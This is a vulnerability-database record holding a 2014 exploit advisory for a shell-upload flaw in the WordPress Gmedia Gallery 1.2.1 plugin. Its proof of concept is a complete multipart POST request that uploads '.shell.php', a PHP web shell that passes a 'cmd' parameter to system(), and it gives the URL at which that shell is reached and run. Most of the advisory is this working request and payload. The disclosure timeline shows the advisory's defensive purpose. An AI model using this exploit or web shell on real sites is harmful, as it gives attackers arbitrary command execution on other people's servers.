{"id": "PACKETSTORM:127725", "type": "packetstorm", "bulletinFamily": "exploit", "title": "WordPress Gmedia Gallery 1.2.1 Shell Upload", "description": "", "published": "2014-08-03T00:00:00", "modified": "2014-08-03T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/127725/WordPress-Gmedia-Gallery-1.2.1-Shell-Upload.html", "reporter": "Claudio Viviani", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:20:16", "viewCount": 27, "enchantments": {"score": {"value": 0.1, "vector": "NONE", "modified": "2016-11-03T10:20:16", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:20:16", "rev": 2}, "vulnersScore": 0.1}, "sourceHref": "https://packetstormsecurity.com/files/download/127725/wpgmediagallery-shell.txt", "sourceData": "`\ufeff###################### \n# Exploit Title : Wordpress Gmedia Gallery 1.2.1 Shell Upload Vulnerability \n \n# Exploit Author : Claudio Viviani \n \n# Vendor Homepage : http://www.codeasily.com/ \n \n# Software Link : http://downloads.wordpress.org/plugin/grand-media.zip \n \n# Date : 2014-08-01 \n \n# Tested on : Windows 7 / Mozilla Firefox \n \n###################### \n \n# Description : \n \nAny user could upload php files (administrator by default). \n \n###################### \n \n# Vulnerability Disclosure Timeline: \n \n2014-08-01: Discovered vulnerability \n2014-08-01: Vendor Notification (Twitter) \n2014-08-01: Vendor Response/Feedback \n2014-08-02: Vendor Fix/Patch \n2014-08-02: Public Disclosure \n \n###################### \n \n# PoC: \n \nPOST \nHost=127.0.0.1 \nUser-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0 \nAccept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language=it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3 \nAccept-Encoding=gzip, deflate \nReferer=http://127.0.0.1/wordpress/wp-admin/admin.php?page=GrandMedia_AddMedia \nContent-Length=916 \nContent-Type=multipart/form-data; boundary=---------------------------304431219031197 \nCookie=wordpress_75aacd302e2a4723897cb1d154c13f77=pippo%7C1407087221%7Ce7319f78d3d8ab969d8896d72dc8c2da; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_75aacd302e2a4723897cb1d154c13f77=pippo%7C1407087221%7C7d38cc7811b5a07ab22e799069eed6e7; wp-settings-time-1=1406915840 \nConnection=keep-alive \nPragma=no-cache \nCache-Control=no-cache \nPOSTDATA =-----------------------------304431219031197 \nContent-Disposition: form-data; name=\"name\" \n \n.shell.php \n-----------------------------304431219031197 \nContent-Disposition: form-data; name=\"chunk\" \n \n0 \n-----------------------------304431219031197 \nContent-Disposition: form-data; name=\"chunks\" \n \n1 \n-----------------------------304431219031197 \nContent-Disposition: form-data; name=\"params\" \n \nterms%5Bgmedia_category%5D=&terms%5Bgmedia_album%5D=&terms%5Bgmedia_tag%5D= \n-----------------------------304431219031197 \nContent-Disposition: form-data; name=\"file\"; filename=\".shell.php\" \nContent-Type: application/octet-stream \n \n<?php \n \nif(isset($_REQUEST['cmd'])){ \necho \"<pre>\"; \n$cmd = ($_REQUEST['cmd']); \nsystem($cmd); \necho \"</pre>\"; \ndie; \n} \n \n?> \n \n \n \n-----------------------------304431219031197-- \n \n \nBackdoor location: \n \nhttp://127.0.0.1/wordpress/wp-content/grand-media/application/.shell.php?cmd=pwd \n \n \n##################### \n \nDiscovered By : Claudio Viviani \nhttp://www.homelab.it \ninfo@homelab.it \nhomelabit@protonmail.ch \n \nhttps://www.facebook.com/homelabit \nhttps://twitter.com/homelabit \nhttps://plus.google.com/+HomelabIt1/ \n \n##################### \n`\n", "immutableFields": []}

{}